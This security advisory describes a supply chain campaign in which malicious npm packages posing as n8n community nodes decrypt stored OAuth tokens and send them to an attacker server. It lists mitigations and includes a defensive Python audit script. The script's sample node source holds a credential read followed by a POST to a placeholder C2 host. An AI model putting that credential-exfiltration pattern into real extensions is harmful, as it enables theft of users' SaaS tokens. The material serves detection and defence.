Current Cyber Threats

n8mare on Auth Street: Supply Chain Attack Targets n8n Ecosystem

Summary:
Threat actors are actively conducting a software supply chain attack against the n8n workflow automation ecosystem via malicious npm packages. The packages masquerade as legitimate "community nodes", which n8n automatically recognizes and loads as new nodes (in this campaign, Google Ads integrations), to deceive users into installing them on their n8n instances. Once installed, the malicious nodes function as intended, capturing the user's configuration, but covertly exfiltrate high-value credentials, including OAuth tokens, Client IDs, and Refresh Tokens, to an attacker-controlled C2 server. While n8n encrypts these credentials at rest, the malicious code abuses n8n's runtime environment: during the "Execute Workflow" phase, the node invokes standard n8n APIs (this.getCredentials) to decrypt the stored credentials. Because n8n acts as a central automation hub, it often holds privileged access (OAuth scopes, API keys) to critical business services such as Google, Salesforce, and Stripe. Compromise of these tokens gives attackers persistent, third-party access to the victim's connected SaaS ecosystems.

Security Officer Comments:
This campaign represents a significant tactical evolution in supply chain attacks, moving beyond the compromise of developer workstations to target Workflow Automation Platforms (WAPs). Platforms like n8n, Zapier, or Make serve as centralized vaults for secrets, aggregating high-privilege credentials for dozens of services in a single location. The attack exploits the implicit trust users place in "community" extensions. Community nodes run with the same privileges as core nodes, and there is essentially no sandboxing between third-party code and the core runtime, which is what makes that implicit trust so effective for the attacker. By targeting refresh tokens, the attackers gain long-term persistent access to victim environments.

Organizations utilizing n8n should immediately audit installed community nodes against the published IOC list. Restrict n8n instances to a strict allow-list of official nodes where possible and monitor outbound traffic for unexpected POST requests to unrelated cloud hosting subdomains. Because the stolen tokens are legitimate, rotating all credentials stored in any affected n8n instance is necessary to sever attacker access.

Suggested Corrections:
IOCs: https://www.endorlabs.com/learn/n8mare-on-auth-street-supply-chain-attack-targets-n8n-ecosystem

Users should follow these practices to reduce the risk of n8n supply chain attacks:
  • Use official nodes and prefer n8n's built-in integrations wherever possible.
  • Audit packages before installing them by reviewing their source code on npm or GitHub.
  • Scrutinize package metadata for red flags such as empty descriptions, random names, low download counts, or missing documentation.
  • Monitor outbound network traffic from n8n instances to detect suspicious activity, such as unexpected POST requests to hosts unrelated to the node's integration.
  • Use isolated service accounts with the least privileges required to minimize credential risk.
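One way to act on the audit recommendation above: a static check over installed community nodes that flags a node file which calls getCredentials and also hard-codes URLs to hosts outside the integration's expected domains. This is an added example, not code from the advisory or from n8n; the install path, the package.json layout, the allow-list and the sample node source are assumptions or constructed for the demo.

```python
"""Static audit of installed n8n community nodes: flags node files that
decrypt credentials via getCredentials and also embed URLs whose hosts lie
outside the integration's expected domains.
Added example, not code from the advisory or from n8n. Assumptions: community
packages live under ~/.n8n/nodes/node_modules and each package.json declares
its node files under "n8n" -> "nodes". Allow-list and sample are constructed.
"""
import json
import re
from pathlib import Path
from urllib.parse import urlparse

NODES_ROOT = Path.home() / ".n8n" / "nodes" / "node_modules"  # assumed default
URL_RE = re.compile(r"https?://[^\s'\"`)]+")
CRED_RE = re.compile(r"\bgetCredentials\s*\(")
ALLOWED_GOOGLE_HOSTS = {"googleapis.com", "google.com"}  # constructed allow-list
# Constructed sample: reads credentials, then contacts one expected host and one
# unrelated host (placeholder name, not an indicator from the advisory).
SAMPLE_NODE_SOURCE = """
const creds = await this.getCredentials('googleAdsOAuth2Api');
await this.helpers.httpRequest({ url: 'https://googleads.googleapis.com/v16/customers' });
await this.helpers.httpRequest({ method: 'POST', url: 'https://collector.placeholder-c2.example/u' });
"""

def _host_allowed(host: str, allowed: set[str]) -> bool:
    return any(host == a or host.endswith("." + a) for a in allowed)

def find_unexpected_hosts(source: str, allowed: set[str]) -> list[str]:
    """Hosts hard-coded in node source outside the allow-list; reported only
    when the same file also calls getCredentials (otherwise nothing to leak)."""
    if not CRED_RE.search(source):
        return []
    hosts = {urlparse(u).hostname for u in URL_RE.findall(source)}
    return sorted(h for h in hosts if h and not _host_allowed(h, allowed))

def audit_package(pkg_dir: Path, allowed: set[str]) -> dict[str, list[str]]:
    """Map each node file declared in package.json to its flagged hosts."""
    manifest = json.loads((pkg_dir / "package.json").read_text())
    findings = {}
    for rel in manifest.get("n8n", {}).get("nodes", []):
        path = pkg_dir / rel
        if path.is_file():
            findings[rel] = find_unexpected_hosts(path.read_text(), allowed)
    return findings

if __name__ == "__main__":  # scoped @org packages need a second glob
    for pkg in sorted(NODES_ROOT.glob("*/package.json")):
        for node, hosts in audit_package(pkg.parent, ALLOWED_GOOGLE_HOSTS).items():
            if hosts:
                print(f"{pkg.parent.name}/{node}: reads credentials, contacts {hosts}")
```

A clean result does not prove a package is benign (URLs can be assembled at runtime), so treat this as a triage aid alongside the published IOC list and outbound traffic monitoring.
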
Link(s):
https://thehackernews.com/2026/01/n8n-supply-chain-attack-abuses.html

https://www.endorlabs.com/learn/n8mare-on-auth-street-supply-chain-attack-targets-n8n-ecosystem